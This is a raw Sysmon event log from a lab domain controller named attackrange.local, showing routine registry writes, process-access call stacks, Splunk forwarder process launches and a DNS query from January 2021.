13241300x800000000000000014492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ea7b-0x7068d151) 13241300x800000000000000014491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ea83-0xd22d3951) 13241300x800000000000000014490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000014489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00208ef6) 13241300x800000000000000014488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ea73-0x0ea46951) 13241300x800000000000000014487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ea7b-0x7068d151) 13241300x800000000000000014486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ea83-0xd22d3951) 10341000x800000000000000014498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:56.946{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x800000000000000014497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1101SetValue2021-01-14 13:44:56.836{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\CachedMachineNames\NameUserPrincipalWIN-DC-250$@attackrange.local 10341000x800000000000000014496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:56.133{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000014499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:56.335{08A6967A-4288-6000-1500-000000009A01}1324win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 13241300x800000000000000014502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:02.024{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\E353614F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_E353614F-0000-0000-0000-100000000000.XML 13241300x800000000000000014501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:02.008{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Config SourceDWORD (0x00000001) 13241300x800000000000000014500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:02.008{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_2F6F85D1-BD71-4F32-93CC-49B3DCE2851F.XML 10341000x800000000000000014504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:13.415{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:13.415{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.946{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AEB-6000-A205-000000009A01}6260C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.946{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.946{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.946{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.946{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.946{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4AEB-6000-A205-000000009A01}6260C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.946{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AEB-6000-A205-000000009A01}6260C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.947{08A6967A-4AEB-6000-A205-000000009A01}6260C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.274{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AEB-6000-A105-000000009A01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.274{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.274{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.274{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.274{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.274{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4AEB-6000-A105-000000009A01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.274{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AEB-6000-A105-000000009A01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:15.275{08A6967A-4AEB-6000-A105-000000009A01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:16.618{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AEC-6000-A305-000000009A01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:16.618{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:16.618{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:16.618{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 